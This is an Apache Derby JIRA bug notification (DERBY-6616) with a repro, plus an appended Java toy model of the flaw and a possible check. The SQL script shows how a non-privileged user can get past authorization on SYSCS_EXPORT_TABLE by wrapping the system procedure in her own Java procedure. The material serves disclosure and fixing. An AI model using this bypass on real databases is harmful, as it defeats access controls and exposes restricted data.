[ https://issues.apache.org/jira/browse/DERBY-6616?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Rick Hillegas updated DERBY-6616:
---------------------------------

    Attachment: SystemProcWrapper.java

Attaching SystemProcWrapper.java, which contains a procedure wrapping 
SYSCS_UTIL.SYSCS_EXPORT_TABLE. The following script shows how to use this 
procedure to circumvent SQL authorization checks on the system procedure:

{noformat}
connect 'jdbc:derby:memory:db1;create=true;user=test_dbo';

call syscs_util.syscs_create_user( 'TEST_DBO', 'test_dbopassword' );
call syscs_util.syscs_create_user( 'RUTH', 'ruthpassword' );

-- shutdown in order to enable NATIVE authentication
connect 'jdbc:derby:memory:db1;shutdown=true';

connect 'jdbc:derby:memory:db1;user=test_dbo;password=test_dbopassword' as dbo;

create table t( a int );
insert into t values ( 1 );

grant select on t to public;

connect 'jdbc:derby:memory:db1;user=ruth;password=ruthpassword' as ruth;

-- ruth can't execute this procedure directly
call syscs_util.syscs_export_table( 'TEST_DBO', 'T', 'z.dat', null, null, null );

create procedure wrapSYSCS_EXPORT_TABLE
(
    in schemaname  varchar(128),
    in tablename varchar(128),
    in filename varchar(32672),
    in columndelimiter char(1),
    in characterdelimiter char(1),
    in codeset varchar(128)
)
language java parameter style java reads sql data
external name 'SystemProcWrapper.wrapSYSCS_EXPORT_TABLE';

-- but she can execute this wrapper procedure
call wrapSYSCS_EXPORT_TABLE( 'TEST_DBO', 'T', 'z.dat', null, null, null );
{noformat}


> User procedures can call system procedures, circumventing SQL authorization.
> ----------------------------------------------------------------------------
>
>                 Key: DERBY-6616
>                 URL: https://issues.apache.org/jira/browse/DERBY-6616
>             Project: Derby
>          Issue Type: Bug
>          Components: SQL
>    Affects Versions: 10.11.0.0
>            Reporter: Rick Hillegas
>         Attachments: SystemProcWrapper.java
>
>
> System procedures are implemented as public static methods in 
> org.apache.derby.catalog.SystemProcedures. These methods can be called by 
> code in user-written procedures. This allows a user-written procedure to 
> circumvent the SQL authorization checks which are supposed to limit some 
> procedures to being called only by the DBO. I will attach a repro.



--
This message was sent by Atlassian JIRA
(v6.2#6252)
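
The gap described in this issue, as an added toy model: it is not Derby code and not the attached SystemProcWrapper.java. All class, method and routine names are hypothetical, and the in-method check is one assumed way to close the gap, not a fix stated in this message.

```java
// Toy model of the DERBY-6616 gap. Hypothetical names throughout; not Derby code.
public class ProcAuthModel {
    // Session user as an engine would track it for the current connection.
    static final ThreadLocal<String> CURRENT_USER = new ThreadLocal<>();
    static final String DBO = "TEST_DBO";

    static void requireDbo(String routine) {
        if (!DBO.equals(CURRENT_USER.get())) {
            throw new SecurityException(CURRENT_USER.get() + " may not execute " + routine);
        }
    }

    // Weak form: the method trusts that the SQL layer already authorized the caller.
    static String exportTableUnchecked(String schema, String table) {
        return "exported " + schema + "." + table;
    }

    // Hardened form: the method checks the session user itself, so the check
    // holds no matter which code path reached it.
    static String exportTableChecked(String schema, String table) {
        requireDbo("exportTable");
        return "exported " + schema + "." + table;
    }

    // Stand-in for the SQL CALL dispatcher. The system routine is DBO-only at
    // this layer; the two wrappers model user procedures whose Java bodies
    // invoke the public static method directly.
    static String sqlCall(String routine, String schema, String table) {
        switch (routine) {
            case "SYSCS_EXPORT_TABLE":
                requireDbo(routine);
                return exportTableUnchecked(schema, table);
            case "WRAP_UNCHECKED":
                return exportTableUnchecked(schema, table); // SQL-layer check never runs
            case "WRAP_CHECKED":
                return exportTableChecked(schema, table);   // check travels with the method
            default:
                throw new IllegalArgumentException(routine);
        }
    }

    public static void main(String[] args) {
        CURRENT_USER.set("RUTH"); // constructed non-DBO session
        for (String r : new String[] {"SYSCS_EXPORT_TABLE", "WRAP_UNCHECKED", "WRAP_CHECKED"}) {
            try {
                System.out.println(r + ": " + sqlCall(r, "TEST_DBO", "T"));
            } catch (SecurityException e) {
                System.out.println(r + ": denied (" + e.getMessage() + ")");
            }
        }
    }
}
```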
